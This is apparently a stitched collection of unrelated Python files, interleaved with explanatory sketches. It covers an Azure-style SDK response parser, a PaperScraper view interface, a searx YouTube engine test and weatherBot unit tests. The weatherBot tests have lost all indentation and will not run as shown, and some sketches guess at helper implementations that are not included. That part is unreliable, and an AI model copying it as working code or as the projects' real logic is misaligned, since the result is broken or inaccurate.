            if response_content:
                response_doc = json.loads(response_content.decode())

            if response_doc is not None:
                value_array = response_doc.get('value', None)
                if value_array is not None:
                    for value_value in value_array:
                        tag_details_instance = TagDetails(values=[])
                        result.tags.append(tag_details_instance)

                        id_value = value_value.get('id', None)
                        if id_value is not None:
                            id_instance = id_value
                            tag_details_instance.id = id_instance

                        tag_name_value = value_value.get('tagName', None)
                        if tag_name_value is not None:
                            tag_name_instance = tag_name_value
                            tag_details_instance.name = tag_name_instance

                        count_value = value_value.get('count', None)
                        if count_value is not None:
                            count_instance = TagCount()
                            tag_details_instance.count = count_instance

                            type_value = count_value.get('type', None)
                            if type_value is not None:
                                type_instance = type_value
                                count_instance.type = type_instance

                            value_value2 = count_value.get('value', None)
                            if value_value2 is not None:
                                value_instance = value_value2
                                count_instance.value = value_instance

                        values_array = value_value.get('values', None)
                        if values_array is not None:
                            for values_value in values_array:
                                tag_value_instance = TagValue()
                                tag_details_instance.values.append(tag_value_instance)

                                id_value2 = values_value.get('id', None)
                                if id_value2 is not None:
                                    id_instance2 = id_value2
                                    tag_value_instance.id = id_instance2

                                tag_value_value = values_value.get('tagValue', None)
                                if tag_value_value is not None:
                                    tag_value_instance2 = tag_value_value
                                    tag_value_instance.value = tag_value_instance2

                                count_value2 = values_value.get('count', None)
                                if count_value2 is not None:
                                    count_instance2 = TagCount()
                                    tag_value_instance.count = count_instance2

                                    type_value2 = count_value2.get('type', None)
                                    if type_value2 is not None:
                                        type_instance2 = type_value2
                                        count_instance2.type = type_instance2

                                    value_value3 = count_value2.get('value', None)
                                    if value_value3 is not None:
                                        value_instance2 = value_value3
                                        count_instance2.value = value_instance2

                odatanext_link_value = response_doc.get('@odata.nextLink', None)
                if odatanext_link_value is not None:
                    odatanext_link_instance = odatanext_link_value
                    result.next_link = odatanext_link_instance

        result.status_code = status_code
        result.request_id = response.headers.get('x-ms-request-id')

        return result
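Every operation above assembles its request URL the same way: trim the trailing `/` from `base_uri`, trim the leading `/` from the relative path, join the two with a single `/`, and percent-encode spaces. A minimal standalone sketch of that logic follows; `join_url` and the sample subscription ID are hypothetical, not part of the generated SDK:

```python
from urllib.parse import quote


def join_url(base_url, path, query_parameters):
    # Append the query string, as the generated methods do.
    if len(query_parameters) > 0:
        path = path + '?' + '&'.join(query_parameters)
    # Trim '/' from the end of base_url and the beginning of path.
    if base_url.endswith('/'):
        base_url = base_url[:-1]
    if path.startswith('/'):
        path = path[1:]
    return (base_url + '/' + path).replace(' ', '%20')


url = join_url('https://management.azure.com/',
               '/subscriptions/' + quote('1234') + '/tagNames/' + quote('env name'),
               ['api-version=2014-04-01-preview'])
print(url)
```

Because both sides are trimmed before joining, the result has exactly one `/` at the seam regardless of whether `base_uri` ends with a slash.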
# File: tensor2struct/models/spider/__init__.py (chenyangh/tensor2struct-public, MIT)
from . import spider_enc
from . import spider_enc_bert
from . import spider_linking
from . import spider_beam_search
# File: src/regnet/helpers/quaternion/__init__.py (markrofail/multi-modal-deep-learning-for-vehicle-sensor-data-abstraction-and-attack-detection, MIT)
from . import (mat3_op, mat4_op, quat_op, dualqt_op)
__all__ = ['mat3_op', 'mat4_op', 'quat_op', 'dualqt_op']
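A quick sketch of what the `__all__` declaration above buys: a star-import pulls in only the listed names. The `quat_demo` module below is a throwaway in-memory stand-in, not part of the package:

```python
import sys
import types

# Build a disposable module in memory so the example is self-contained.
mod = types.ModuleType('quat_demo')
exec(
    "__all__ = ['mat3_op', 'mat4_op']\n"
    "def mat3_op(): return 'mat3'\n"
    "def mat4_op(): return 'mat4'\n"
    "def extra_op(): return 'not exported'\n",
    mod.__dict__,
)
sys.modules['quat_demo'] = mod

ns = {}
exec('from quat_demo import *', ns)
# Only names listed in __all__ are bound by the star-import.
print(sorted(n for n in ns if not n.startswith('__')))  # → ['mat3_op', 'mat4_op']
```

Without `__all__`, the star-import would instead bind every public (non-underscore) top-level name.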
# File: src/daemon/Configuration/__init__.py (0CT3T/Daemon_Home_Integration, MIT)
from daemon.Configuration.configuration import configuration
from daemon.Configuration.Modele import *

# File: src/view/view.py (samlowe106/PaperScraper, MIT)
from getpass import getpass
from typing import Any


class View():
    """
    Interface representing a way to interact with PaperScraper
    """

    def print_message(self, message: Any) -> None:
        """
        Shows output to the user
        :param message: message to show the user
        """

    def get_input(self, prompt: str, field: str) -> str:
        """
        Gets user input
        NOTE: DO NOT USE FOR SENSITIVE DATA! For sensitive data such as passwords,
        use get_password instead!
        :param prompt: prompt to show the user
        :param field: the field from which to retrieve user input (if necessary)
        :return: user input
        """

    def get_password(self, prompt: str) -> str:
        """
        Gets sensitive user input, such as a password, in a secure way
        :param prompt: prompt to show the user
        :return: user input
        """


class TextView(View):
    """
    Class representing a way to interact with PaperScraper through the Terminal or Command Line
    """

    def __init__(self):
        return

    def print_message(self, message: Any):
        """
        Shows output to the user
        :param message: message to show the user
        """
        print(message)

    def get_input(self, prompt: str, field=None) -> str:
        """
        Gets user input
        NOTE: DO NOT USE FOR SENSITIVE DATA! For sensitive data such as passwords,
        use get_password instead!
        :param prompt: prompt to show the user
        :param field: (not used)
        :return: user input
        :raise ValueError: if a value is passed for field
        """
        if field is not None:
            raise ValueError("No value should be passed for field!")
        return input(prompt)

    def get_password(self, prompt: str) -> str:
        return getpass(prompt)


class FlaskWebView(View):
    """
    Class representing a way to interact with PaperScraper through a Flask website
    """

    def print_message(self, message: Any):
        """
        Shows output to the user
        :param message: message to show the user
        """
        # TODO
        str(message)

    def get_input(self, prompt: str, field: str) -> str:
        """
        Gets user input
        NOTE: DO NOT USE FOR SENSITIVE DATA! For sensitive data such as passwords,
        use get_password instead!
        :param prompt: prompt to show the user
        :param field: the field from which to retrieve user input
        :return: user input
        """
        # TODO

    def get_password(self, prompt: str) -> str:
        """
        Gets sensitive user input, such as a password, in a secure way
        :param prompt: prompt to show the user
        :return: user input
        """
        # TODO
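Because every front end exposes the same View surface, code that drives it can be exercised with a scripted stand-in instead of a live terminal or web page. `ScriptedView` below is a hypothetical test double, not part of PaperScraper:

```python
class ScriptedView:
    """Test double that answers prompts from a canned list of replies."""

    def __init__(self, replies):
        self._replies = list(replies)
        self.shown = []  # record of everything "printed"

    def print_message(self, message):
        self.shown.append(str(message))

    def get_input(self, prompt, field=None):
        # Pop the next scripted reply instead of blocking on input().
        return self._replies.pop(0)

    def get_password(self, prompt):
        return self._replies.pop(0)


view = ScriptedView(['alice', 'hunter2'])
user = view.get_input('Username: ')
password = view.get_password('Password: ')
view.print_message('logged in as ' + user)
print(view.shown)  # → ['logged in as alice']
```

Swapping the double in for `TextView` lets tests assert on prompts and output without monkeypatching `input` or `getpass`.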
# File: Toolkits/Discovery/meta/searx/tests/unit/engines/test_youtube_noapi.py (roscopecoltran/SniperKit-Core, MIT)
# -*- coding: utf-8 -*-
from collections import defaultdict
import mock
from searx.engines import youtube_noapi
from searx.testing import SearxTestCase


class TestYoutubeNoAPIEngine(SearxTestCase):

    def test_request(self):
        query = 'test_query'
        dicto = defaultdict(dict)
        dicto['pageno'] = 0
        dicto['time_range'] = ''
        params = youtube_noapi.request(query, dicto)
        self.assertIn('url', params)
        self.assertIn(query, params['url'])
        self.assertIn('youtube.com', params['url'])

    def test_time_range_search(self):
        dicto = defaultdict(dict)
        query = 'test_query'
        dicto['time_range'] = 'year'
        params = youtube_noapi.request(query, dicto)
        self.assertIn('&sp=EgIIBQ%253D%253D', params['url'])

        dicto['time_range'] = 'month'
        params = youtube_noapi.request(query, dicto)
        self.assertIn('&sp=EgIIBA%253D%253D', params['url'])

        dicto['time_range'] = 'week'
        params = youtube_noapi.request(query, dicto)
        self.assertIn('&sp=EgIIAw%253D%253D', params['url'])

        dicto['time_range'] = 'day'
        params = youtube_noapi.request(query, dicto)
        self.assertIn('&sp=EgIIAg%253D%253D', params['url'])

    def test_response(self):
        self.assertRaises(AttributeError, youtube_noapi.response, None)
        self.assertRaises(AttributeError, youtube_noapi.response, [])
        self.assertRaises(AttributeError, youtube_noapi.response, '')
        self.assertRaises(AttributeError, youtube_noapi.response, '[]')

        response = mock.Mock(text='<html></html>')
        self.assertEqual(youtube_noapi.response(response), [])

        html = """
        <ol id="item-section-063864" class="item-section">
        <li>
        <div class="yt-lockup yt-lockup-tile yt-lockup-video vve-check clearfix yt-uix-tile"
        data-context-item-id="DIVZCPfAOeM"
        data-visibility-tracking="CBgQ3DAYACITCPGXnYau6sUCFZEIHAod-VQASCj0JECx_-GK5uqMpcIB">
        <div class="yt-lockup-dismissable"><div class="yt-lockup-thumbnail contains-addto">
        <a aria-hidden="true" href="/watch?v=DIVZCPfAOeM" class=" yt-uix-sessionlink pf-link"
        data-sessionlink="itct=CBgQ3DAYACITCPGXnYau6sUCFZEIHAod-VQASCj0JFIEdGVzdA">
        <div class="yt-thumb video-thumb"><img src="//i.ytimg.com/vi/DIVZCPfAOeM/mqdefault.jpg"
        width="196" height="110"/></div><span class="video-time" aria-hidden="true">11:35</span></a>
        <span class="thumb-menu dark-overflow-action-menu video-actions">
        </span>
        </div>
        <div class="yt-lockup-content">
        <h3 class="yt-lockup-title">
        <a href="/watch?v=DIVZCPfAOeM"
        class="yt-uix-tile-link yt-ui-ellipsis yt-ui-ellipsis-2 yt-uix-sessionlink spf-link"
        data-sessionlink="itct=CBgQ3DAYACITCPGXnYau6sUCFZEIHAod-VQASCj0JFIEdGVzdA"
        title="Top Speed Test Kawasaki Ninja H2 (Thailand) By. MEHAY SUPERBIKE"
        aria-describedby="description-id-259079" rel="spf-prefetch" dir="ltr">
        Title
        </a>
        <span class="accessible-description" id="description-id-259079"> - Durée : 11:35.</span>
        </h3>
        <div class="yt-lockup-byline">de
        <a href="/user/mheejapan" class=" yt-uix-sessionlink spf-link g-hovercard"
        data-sessionlink="itct=CBgQ3DAYACITCPGXnYau6sUCFZEIHAod-VQASCj0JA" data-ytid="UCzEesu54Hjs0uRKmpy66qeA"
        data-name="">MEHAY SUPERBIKE</a></div><div class="yt-lockup-meta">
        <ul class="yt-lockup-meta-info">
        <li>il y a 20 heures</li>
        <li>8 424 vues</li>
        </ul>
        </div>
        <div class="yt-lockup-description yt-ui-ellipsis yt-ui-ellipsis-2" dir="ltr">
        Description
        </div>
        <div class="yt-lockup-badges">
        <ul class="yt-badge-list ">
        <li class="yt-badge-item" >
        <span class="yt-badge">Nouveauté</span>
        </li>
        <li class="yt-badge-item" ><span class="yt-badge " >HD</span></li>
        </ul>
        </div>
        <div class="yt-lockup-action-menu yt-uix-menu-container">
        <div class="yt-uix-menu yt-uix-videoactionmenu hide-until-delayloaded"
        data-video-id="DIVZCPfAOeM" data-menu-content-id="yt-uix-videoactionmenu-menu">
        </div>
        </div>
        </div>
        </div>
        </div>
        </li>
        </ol>
        """
        response = mock.Mock(text=html)
        results = youtube_noapi.response(response)
        self.assertEqual(type(results), list)
        self.assertEqual(len(results), 1)
        self.assertEqual(results[0]['title'], 'Title')
        self.assertEqual(results[0]['url'], 'https://www.youtube.com/watch?v=DIVZCPfAOeM')
        self.assertEqual(results[0]['content'], 'Description')
        self.assertEqual(results[0]['thumbnail'], 'https://i.ytimg.com/vi/DIVZCPfAOeM/hqdefault.jpg')
        self.assertTrue('DIVZCPfAOeM' in results[0]['embedded'])

        html = """
        <ol id="item-section-063864" class="item-section">
        <li>
        <div class="yt-lockup yt-lockup-tile yt-lockup-video vve-check clearfix yt-uix-tile"
        data-context-item-id="DIVZCPfAOeM"
        data-visibility-tracking="CBgQ3DAYACITCPGXnYau6sUCFZEIHAod-VQASCj0JECx_-GK5uqMpcIB">
        <div class="yt-lockup-dismissable"><div class="yt-lockup-thumbnail contains-addto">
        <a aria-hidden="true" href="/watch?v=DIVZCPfAOeM" class=" yt-uix-sessionlink pf-link"
        data-sessionlink="itct=CBgQ3DAYACITCPGXnYau6sUCFZEIHAod-VQASCj0JFIEdGVzdA">
        <div class="yt-thumb video-thumb"><img src="//i.ytimg.com/vi/DIVZCPfAOeM/mqdefault.jpg"
        width="196" height="110"/></div><span class="video-time" aria-hidden="true">11:35</span></a>
        <span class="thumb-menu dark-overflow-action-menu video-actions">
        </span>
        </div>
        <div class="yt-lockup-content">
        <h3 class="yt-lockup-title">
        <span class="accessible-description" id="description-id-259079"> - Durée : 11:35.</span>
        </h3>
        <div class="yt-lockup-byline">de
        <a href="/user/mheejapan" class=" yt-uix-sessionlink spf-link g-hovercard"
        data-sessionlink="itct=CBgQ3DAYACITCPGXnYau6sUCFZEIHAod-VQASCj0JA" data-ytid="UCzEesu54Hjs0uRKmpy66qeA"
        data-name="">MEHAY SUPERBIKE</a></div><div class="yt-lockup-meta">
        <ul class="yt-lockup-meta-info">
        <li>il y a 20 heures</li>
        <li>8 424 vues</li>
        </ul>
        </div>
        <div class="yt-lockup-badges">
        <ul class="yt-badge-list ">
        <li class="yt-badge-item" >
        <span class="yt-badge">Nouveauté</span>
        </li>
        <li class="yt-badge-item" ><span class="yt-badge " >HD</span></li>
        </ul>
        </div>
        <div class="yt-lockup-action-menu yt-uix-menu-container">
        <div class="yt-uix-menu yt-uix-videoactionmenu hide-until-delayloaded"
        data-video-id="DIVZCPfAOeM" data-menu-content-id="yt-uix-videoactionmenu-menu">
        </div>
        </div>
        </div>
        </div>
        </div>
        </li>
        </ol>
        """
        response = mock.Mock(text=html)
        results = youtube_noapi.response(response)
        self.assertEqual(type(results), list)
        self.assertEqual(len(results), 1)

        html = """
        <ol id="item-section-063864" class="item-section">
        <li>
        </li>
        </ol>
        """
        response = mock.Mock(text=html)
        results = youtube_noapi.response(response)
        self.assertEqual(type(results), list)
        self.assertEqual(len(results), 0)
"""
given the array [2, 3, 4, 6, 8, 10, 11] return this: "2-4,6,8,10-11"
what...
"""
#!/usr/bin/env python3
# weatherBot tests
# Copyright 2015-2016 Brian Mitchell under the MIT license
# See the GitHub repository: https://github.com/bman4789/weatherBot
import unittest
import sys
import logging
import os
import random
import tweepy
import forecastio
import pytz
import datetime
import configparser
from testfixtures import LogCapture
import weatherBot
import keys
import strings
import utils
# TODO write tests
class TestUtils(unittest.TestCase):
def test_centerpoint(self):
"""Testing finding a centerpoint from a bounding box of locations"""
box = [[-93.207783, 44.89076], [-93.003514, 44.89076], [-93.003514, 44.992279], [-93.207783, 44.992279]]
average = utils.centerpoint(box)
self.assertEqual(average[0], 44.9415195)
self.assertEqual(average[1], -93.1056485)
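The assertions above pin `utils.centerpoint` down as a plain average over the bounding-box corners, taking `[lng, lat]` pairs and returning `(lat, lng)`. A minimal sketch consistent with the test (the real implementation in `utils.py` may differ):

```python
def centerpoint(box):
    """Average a list of [lng, lat] corner pairs into a (lat, lng) tuple."""
    lats = [corner[1] for corner in box]
    lngs = [corner[0] for corner in box]
    return (sum(lats) / len(lats), sum(lngs) / len(lngs))
```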
def test_get_wind_direction(self):
"""Testing if wind direction conversions are successful"""
self.assertEqual(utils.get_wind_direction(0), 'N')
self.assertEqual(utils.get_wind_direction(338), 'N')
self.assertEqual(utils.get_wind_direction(65), 'NE')
self.assertEqual(utils.get_wind_direction(110), 'E')
self.assertEqual(utils.get_wind_direction(150), 'SE')
self.assertEqual(utils.get_wind_direction(200), 'S')
self.assertEqual(utils.get_wind_direction(240), 'SW')
self.assertEqual(utils.get_wind_direction(290), 'W')
self.assertEqual(utils.get_wind_direction(330), 'NW')
self.assertEqual(utils.get_wind_direction(400), 'N')
self.assertEqual(utils.get_wind_direction(-4), 'N')
self.assertEqual(utils.get_wind_direction('five'), '')
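The assertions above imply an 8-point compass mapping with 45° sectors, out-of-range bearings falling back to 'N', and non-numeric input yielding an empty string. A sketch consistent with those assertions (the actual `utils.get_wind_direction` may differ):

```python
def get_wind_direction(degrees):
    """Map a wind bearing in degrees to one of the 8 compass points."""
    try:
        degrees = int(degrees)
    except (TypeError, ValueError):
        return ''               # non-numeric input yields an empty string
    if degrees < 0 or degrees > 360:
        return 'N'              # out-of-range bearings fall back to north
    if degrees >= 337.5 or degrees < 22.5:
        return 'N'              # the north sector wraps around 0 degrees
    sectors = ['NE', 'E', 'SE', 'S', 'SW', 'W', 'NW']
    return sectors[int((degrees - 22.5) // 45)]
```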
def test_get_units(self):
"""Testing getting units from a country/unit identifier"""
self.assertEqual(utils.get_units('us')['unit'], 'us')
self.assertEqual(utils.get_units('us')['nearestStormDistance'], 'mph')
self.assertEqual(utils.get_units('us')['precipIntensity'], 'in/h')
self.assertEqual(utils.get_units('us')['precipIntensityMax'], 'in/h')
self.assertEqual(utils.get_units('us')['precipAccumulation'], 'in')
self.assertEqual(utils.get_units('us')['temperature'], 'F')
self.assertEqual(utils.get_units('us')['temperatureMin'], 'F')
self.assertEqual(utils.get_units('us')['temperatureMax'], 'F')
self.assertEqual(utils.get_units('us')['apparentTemperature'], 'F')
self.assertEqual(utils.get_units('us')['dewPoint'], 'F')
self.assertEqual(utils.get_units('us')['windSpeed'], 'mph')
self.assertEqual(utils.get_units('us')['pressure'], 'mb')
self.assertEqual(utils.get_units('us')['visibility'], 'mi')
self.assertEqual(utils.get_units('ca')['unit'], 'ca')
self.assertEqual(utils.get_units('ca')['nearestStormDistance'], 'km')
self.assertEqual(utils.get_units('ca')['precipIntensity'], 'mm/h')
self.assertEqual(utils.get_units('ca')['precipIntensityMax'], 'mm/h')
self.assertEqual(utils.get_units('ca')['precipAccumulation'], 'cm')
self.assertEqual(utils.get_units('ca')['temperature'], 'C')
self.assertEqual(utils.get_units('ca')['temperatureMin'], 'C')
self.assertEqual(utils.get_units('ca')['temperatureMax'], 'C')
self.assertEqual(utils.get_units('ca')['apparentTemperature'], 'C')
self.assertEqual(utils.get_units('ca')['dewPoint'], 'C')
self.assertEqual(utils.get_units('ca')['windSpeed'], 'km/h')
self.assertEqual(utils.get_units('ca')['pressure'], 'hPa')
self.assertEqual(utils.get_units('ca')['visibility'], 'km')
self.assertEqual(utils.get_units('uk2')['unit'], 'uk2')
self.assertEqual(utils.get_units('uk2')['nearestStormDistance'], 'mi')
self.assertEqual(utils.get_units('uk2')['precipIntensity'], 'mm/h')
self.assertEqual(utils.get_units('uk2')['precipIntensityMax'], 'mm/h')
self.assertEqual(utils.get_units('uk2')['precipAccumulation'], 'cm')
self.assertEqual(utils.get_units('uk2')['temperature'], 'C')
self.assertEqual(utils.get_units('uk2')['temperatureMin'], 'C')
self.assertEqual(utils.get_units('uk2')['temperatureMax'], 'C')
self.assertEqual(utils.get_units('uk2')['apparentTemperature'], 'C')
self.assertEqual(utils.get_units('uk2')['dewPoint'], 'C')
self.assertEqual(utils.get_units('uk2')['windSpeed'], 'mph')
self.assertEqual(utils.get_units('uk2')['pressure'], 'hPa')
self.assertEqual(utils.get_units('uk2')['visibility'], 'mi')
self.assertEqual(utils.get_units('si')['unit'], 'si')
self.assertEqual(utils.get_units('si')['nearestStormDistance'], 'km')
self.assertEqual(utils.get_units('si')['precipIntensity'], 'mm/h')
self.assertEqual(utils.get_units('si')['precipIntensityMax'], 'mm/h')
self.assertEqual(utils.get_units('si')['precipAccumulation'], 'cm')
self.assertEqual(utils.get_units('si')['temperature'], 'C')
self.assertEqual(utils.get_units('si')['temperatureMin'], 'C')
self.assertEqual(utils.get_units('si')['temperatureMax'], 'C')
self.assertEqual(utils.get_units('si')['apparentTemperature'], 'C')
self.assertEqual(utils.get_units('si')['dewPoint'], 'C')
self.assertEqual(utils.get_units('si')['windSpeed'], 'm/s')
self.assertEqual(utils.get_units('si')['pressure'], 'hPa')
self.assertEqual(utils.get_units('si')['visibility'], 'km')
def test_precipitation_intensity(self):
"""Testing getting string description from precipitation intensity"""
self.assertEqual(utils.precipitation_intensity(0.00, 'in/h'), 'none')
self.assertEqual(utils.precipitation_intensity(0.002, 'in/h'), 'very-light')
self.assertEqual(utils.precipitation_intensity(0.017, 'in/h'), 'light')
self.assertEqual(utils.precipitation_intensity(0.1, 'in/h'), 'moderate')
self.assertEqual(utils.precipitation_intensity(0.4, 'in/h'), 'heavy')
self.assertEqual(utils.precipitation_intensity(0.00, 'mm/h'), 'none')
self.assertEqual(utils.precipitation_intensity(0.051, 'mm/h'), 'very-light')
self.assertEqual(utils.precipitation_intensity(0.432, 'mm/h'), 'light')
self.assertEqual(utils.precipitation_intensity(2.540, 'mm/h'), 'moderate')
self.assertEqual(utils.precipitation_intensity(5.08, 'mm/h'), 'heavy')
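The intensity buckets tested above suggest a simple lower-bound threshold table, with the mm/h thresholds being the in/h thresholds scaled by 25.4. A sketch consistent with the assertions (the real `utils.precipitation_intensity` may differ):

```python
def precipitation_intensity(intensity, unit):
    """Bucket a precipIntensity value into the labels used by the tests."""
    # Lower bounds per bucket: (very-light, light, moderate, heavy)
    bounds = {'in/h': (0.002, 0.017, 0.1, 0.4),
              'mm/h': (0.051, 0.432, 2.54, 5.08)}
    very_light, light, moderate, heavy = bounds[unit]
    if intensity >= heavy:
        return 'heavy'
    if intensity >= moderate:
        return 'moderate'
    if intensity >= light:
        return 'light'
    if intensity >= very_light:
        return 'very-light'
    return 'none'
```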
def test_get_local_datetime(self):
dt = datetime.datetime.fromtimestamp(1461731335) # datetime.datetime(2016, 4, 26, 23, 28, 55)
timezone_id = 'Europe/Copenhagen'
localized_dt = utils.get_local_datetime(timezone_id, dt)
correct_dt = datetime.datetime.fromtimestamp(1461738535) # datetime.datetime(2016, 4, 27, 1, 28, 55)
self.assertEqual(localized_dt, pytz.timezone('Europe/Copenhagen').localize(correct_dt))
def test_get_utc_datetime(self):
dt = datetime.datetime.fromtimestamp(1461738535) # datetime.datetime(2016, 4, 27, 1, 28, 55)
timezone_id = 'Europe/Copenhagen'
utc_dt = utils.get_utc_datetime(timezone_id, dt)
correct_dt = pytz.timezone('Europe/Copenhagen').localize(dt).astimezone(pytz.utc)
self.assertEqual(utc_dt, correct_dt)
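The two timezone tests above imply that `get_local_datetime` treats its naive input as UTC and converts it to the named zone, while `get_utc_datetime` does the reverse. A minimal pytz-based sketch consistent with the assertions (the actual helpers in `utils.py` may differ):

```python
import datetime
import pytz


def get_local_datetime(timezone_id, dt):
    """Treat a naive datetime as UTC and convert it to the given zone."""
    return pytz.utc.localize(dt).astimezone(pytz.timezone(timezone_id))


def get_utc_datetime(timezone_id, dt):
    """Treat a naive datetime as local to the given zone and convert to UTC."""
    return pytz.timezone(timezone_id).localize(dt).astimezone(pytz.utc)
```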
class TestStrings(unittest.TestCase):
def test_get_precipitation(self):
"""Testing if a precipitation condition is met"""
# testing for 'none' with too low of a probability or precipitation type is 'none'
self.assertEqual(strings.get_precipitation(0.3, 0.5, 'rain', utils.get_units('us')), ('none', 'none'))
self.assertEqual(strings.get_precipitation(0.3, 1, 'none', utils.get_units('us')), ('none', 'none'))
self.assertEqual(strings.get_precipitation(0, 1, 'rain', utils.get_units('us')), ('none', 'none'))
self.assertEqual(strings.get_precipitation(0, 1, 'none', utils.get_units('us')), ('none', 'none'))
# testing with a few possible conditions
self.assertEqual(strings.get_precipitation(0.3, 1, 'rain', utils.get_units('us'))[0], 'moderate-rain')
self.assertEqual(strings.get_precipitation(0.4, 0.85, 'snow', utils.get_units('us'))[0], 'heavy-snow')
self.assertEqual(strings.get_precipitation(0.06, 1, 'sleet', utils.get_units('us'))[0], 'light-sleet')
self.assertEqual(strings.get_precipitation(0.005, 1, 'rain', utils.get_units('us'))[0], 'very-light-rain')
class TestWB(unittest.TestCase):
def setUp(self):
self.location = {'lat': 55.76, 'lng': 12.49, 'name': 'Lyngby-Taarbæk, Hovedstaden'}
self.wd_us = {
'windBearing': 'SW',
'temp_and_unit': '44ºF',
'apparentTemperature_and_unit': '38ºF',
'latitude': 55.76,
'units': {
'unit': 'us',
'temperatureMin': 'F',
'pressure': 'mb',
'precipIntensityMax': 'in/h',
'temperatureMax': 'F',
'visibility': 'mi',
'apparentTemperature': 'F',
'dewPoint': 'F',
'precipAccumulation': 'in',
'nearestStormDistance': 'mph',
'precipIntensity': 'in/h',
'windSpeed': 'mph',
'temperature': 'F'
},
'summary': 'mostly cloudy',
'apparentTemperature': 38.35,
'longitude': 12.49,
'location': 'Lyngby-Taarbæk, Hovedstaden',
'valid': True,
'forecast': {},
'windSpeed_and_unit': '12 mph',
'humidity': 95,
'nearestStormDistance': 99999,
'precipIntensity': 0,
'windSpeed': 11.77,
'temp': 44.32,
'icon': 'partly-cloudy-night'
}
self.wd_ca = {
'windBearing': 'SW',
'temp_and_unit': '7ºC',
'apparentTemperature_and_unit': '3ºC',
'latitude': 55.76,
'units': {
'unit': 'ca',
'temperatureMin': 'C',
'pressure': 'hPa',
'precipIntensityMax': 'mm/h',
'temperatureMax': 'C',
'visibility': 'km',
'apparentTemperature': 'C',
'dewPoint': 'C',
'precipAccumulation': 'cm',
'nearestStormDistance': 'km/h',
'precipIntensity': 'mm/h',
'windSpeed': 'km/h',
'temperature': 'C'
},
'summary': 'mostly cloudy',
'apparentTemperature': 3.46,
'longitude': 12.49,
'location': 'Lyngby-Taarbæk, Hovedstaden',
'valid': True,
'forecast': {},
'windSpeed_and_unit': '19 km/h',
'humidity': 95,
'nearestStormDistance': 99999,
'precipIntensity': 0,
'windSpeed': 18.94,
'temp': 6.78,
'icon': 'partly-cloudy-night'
}
self.wd_uk2 = {
'windBearing': 'SW',
'temp_and_unit': '7ºC',
'apparentTemperature_and_unit': '3ºC',
'latitude': 55.76,
'units': {
'unit': 'uk2',
'temperatureMin': 'C',
'pressure': 'hPa',
'precipIntensityMax': 'mm/h',
'temperatureMax': 'C',
'visibility': 'mi',
'apparentTemperature': 'C',
'dewPoint': 'C',
'precipAccumulation': 'cm',
'nearestStormDistance': 'mi',
'precipIntensity': 'mm/h',
'windSpeed': 'mph',
'temperature': 'C'
},
'summary': 'mostly cloudy',
'apparentTemperature': 3.43,
'longitude': 12.49,
'location': 'Lyngby-Taarbæk, Hovedstaden',
'valid': True,
'forecast': {},
'windSpeed_and_unit': '12 mph',
'humidity': 95,
'nearestStormDistance': 99999,
'precipIntensity': 0,
'windSpeed': 11.77,
'temp': 6.76,
'icon': 'partly-cloudy-night'
}
self.wd_si = {
'windBearing': 'SW',
'temp_and_unit': '7ºC',
'apparentTemperature_and_unit': '3ºC',
'latitude': 55.76,
'units': {
'unit': 'si',
'temperatureMin': 'C',
'pressure': 'hPa',
'precipIntensityMax': 'mm/h',
'temperatureMax': 'C',
'visibility': 'km',
'apparentTemperature': 'C',
'dewPoint': 'C',
'precipAccumulation': 'cm',
'nearestStormDistance': 'km/h',
'precipIntensity': 'mm/h',
'windSpeed': 'm/s',
'temperature': 'C'
},
'summary': 'mostly cloudy',
'apparentTemperature': 3.41,
'longitude': 12.49,
'location': 'Lyngby-Taarbæk, Hovedstaden',
'valid': True,
'forecast': {},
'windSpeed_and_unit': '5 m/s',
'humidity': 94,
'nearestStormDistance': 99999,
'precipIntensity': 0,
'windSpeed': 5.26,
'temp': 6.74,
'icon': 'partly-cloudy-night'
}
def test_config(self):
"""Testing config file handling"""
equal = {
'basic': {
'dm_errors': False,
'units': 'si',
'tweet_location': False,
'hashtag': '',
'refresh': 300
},
'default_location': {
'lat': -79,
'lng': 12,
'name': 'Just a Test'
},
'variable_location': {
'enabled': True,
'user': 'test_user'
},
'log': {
'enabled': False,
'log_path': '/tmp/weatherBotTest.log'
},
'throttles': {
'default': 24,
'wind-chill': 23,
'medium-wind': 22,
'heavy-wind': 21,
'fog': 20,
'cold': 19,
'hot': 18,
'dry': 17,
'heavy-rain': 16,
'moderate-rain': 15,
'light-rain': 14,
'very-light-rain': 13,
'heavy-snow': 12,
'moderate-snow': 11,
'light-snow': 10,
'very-light-snow': 9,
'heavy-sleet': 8,
'moderate-sleet': 7,
'light-sleet': 6,
'very-light-sleet': 5,
'heavy-hail': 4,
'moderate-hail': 3,
'light-hail': 2,
'very-light-hail': 1
}
}
conf = configparser.ConfigParser()
conf['basic'] = {
'dm_errors': 'off',
'units': 'si',
'tweet_location': 'no',
'hashtag': '',
'refresh': '300'
}
conf['default location'] = {
'lat': '-79',
'lng': '12',
'name': 'Just a Test'
}
conf['variable location'] = {
'enabled': 'yes',
'user': 'test_user'
}
conf['log'] = {
'enabled': '0',
'log_path': '/tmp/weatherBotTest.log'
}
conf['throttles'] = {
'default': '24',
'wind-chill': '23',
'medium-wind': '22',
'heavy-wind': '21',
'fog': '20',
'cold': '19',
'hot': '18',
'dry': '17',
'heavy-rain': '16',
'moderate-rain': '15',
'light-rain': '14',
'very-light-rain': '13',
'heavy-snow': '12',
'moderate-snow': '11',
'light-snow': '10',
'very-light-snow': '9',
'heavy-sleet': '8',
'moderate-sleet': '7',
'light-sleet': '6',
'very-light-sleet': '5',
'heavy-hail': '4',
'moderate-hail': '3',
'light-hail': '2',
'very-light-hail': '1'
}
with open(os.getcwd() + '/weatherBotTest.conf', 'w') as configfile:
conf.write(configfile)
weatherBot.load_config(os.getcwd() + '/weatherBotTest.conf')
self.assertEqual(weatherBot.CONFIG, equal)
os.remove(os.getcwd() + '/weatherBotTest.conf')
def test_logging(self):
"""Testing if the system version is in the log and log file"""
with LogCapture() as l:
logger = logging.getLogger()
logger.info('info')
weatherBot.initialize_logger(True, os.getcwd() + '/weatherBotTest.log')
logger.debug('debug')
logger.warning('uh oh')
l.check(('root', 'INFO', 'info'), ('root', 'INFO', 'Starting weatherBot with Python ' + sys.version),
('root', 'DEBUG', 'debug'), ('root', 'WARNING', 'uh oh'))
path = os.path.join(os.getcwd(), 'weatherBotTest.log')
with open(path, 'rb') as path:
data = path.read()
self.assertTrue(bytes(sys.version, 'UTF-8') in data)
self.assertFalse(bytes('debug', 'UTF-8') in data)
self.assertTrue(bytes('uh oh', 'UTF-8') in data)
os.remove(os.getcwd() + '/weatherBotTest.log')
def test_get_location_from_user_timeline(self):
"""Testing getting a location from twitter account's recent tweets"""
